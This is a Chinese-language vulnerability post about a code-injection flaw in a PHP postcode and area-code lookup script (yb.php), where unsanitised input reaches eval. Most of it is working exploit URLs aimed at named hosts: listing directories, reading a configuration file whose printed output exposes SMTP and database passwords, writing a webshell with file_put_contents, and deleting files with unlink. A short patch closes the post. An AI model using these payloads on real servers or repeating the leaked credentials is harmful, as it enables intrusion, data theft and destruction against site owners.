站长工具之“邮编区号查询”高危安全漏洞

方法1、服务器上代码检查方法: 在服务器上找到并打开“邮编区号查询”的相关php文件代码(常用文件名为yb.php)如果存在如下代码: [php] switch ($_GET['w']){ case "sheng": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[0]\");");break; case "diqu": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[1]\");");break; case "shi": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[2]\");");break; case "cun": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[3]\");");break; case "youbian": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[4]\");");break; case "quhao": @eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[5]\");");break; default: @eval("\$found = eregi(\"$keyword[$ai]\",\"$dreamdb[$i]\");");break; }[/php] #1打印目录及文件,可修改参数d的值扫描整站 http://tool.51cto.com/yb/yb.php?q=${@exit(print_r(scandir($_GET[d])))}&d=../../../ [php] Array ( [0] => . [1] => .. [2] => .bash_history [3] => .bash_logout [4] => .bash_profile [5] => .bashrc [6] => .gnome2 [7] => .mozilla [8] => .subversion [9] => .viminfo [10] => ECL [11] => admin.0day5.com [12] => admin.0day5.com.tar [13] => backup [14] => biaozhun [15] => bk [16] => 0day5.com [17] => count.0day5.com [18] => ipatent360 [19] => ipatent360.tar [20] => keji [21] => phpmyadmin [22] => wenshuwenan [23] => zixunbaogao )[/php] #2查看文件,可修改参数d的值查看整站文件 http://tool.0day5.com/yb/yb.php?q=${@exit(print_r(file($_GET[d])))}&d=../../../admin.0day5.com/tool/config.php [php] [123] => if( ! defined( 'SMTP_EMAIL_ACTIVE_PASSWORD' ) ) { [124] => define( 'SMTP_EMAIL_ACTIVE_PASSWORD', 'ecl123456' ); [125] => } [126] => if( ! defined( 'PAGE_CHARSET' ) ) { [127] => define( 'PAGE_CHARSET', 'utf-8' ); [128] => } [129] => /** [130] => * 统计数据库,连接配置 [131] => * @var [132] => */ [133] => $GLB_DB_MEMBER_CONFIG = array( [134] => 'host' => 'localhost', [135] => 'username' => 'admin', [136] => 'password' => 'egreen888888', [137] => 'database' => 'caogenbanquan', [138] => 'charset' => 'utf8' [139] => ); [140] => ?> )[/php] #3写入传说中的webshell,参数d为内容,n为文件名 利用: http://tool.0day5.com/yb/yb.php?q=${@exit(var_dump(file_put_contents($_GET[n],$_GET[d])))}&d=by:0day5.com&n=./../1.txt 对应文件地址: http://tool.0day5.com/1.txt #4删除文件,参数n为文件名 http://tool.0day5.com//yb/yb.php?q=${@exit(var_dump(unlink($_GET[n])))}&n=./../1.txt 修补方法: [php] switch ($_GET['w']){ case "sheng": $found = eregi($keyword[$ai],$detail[0]);break; case "diqu": $found = eregi($keyword[$ai],$detail[1]);break; case "shi": $found = eregi($keyword[$ai],$detail[2]);break; case "cun": $found = eregi($keyword[$ai],$detail[3]);break; case "youbian": $found = eregi($keyword[$ai],$detail[4]);break; case "quhao": $found = eregi($keyword[$ai],$detail[5]);break; default: $found = eregi($keyword[$ai],$dreamdb[$i]);break; }[/php]

发表评论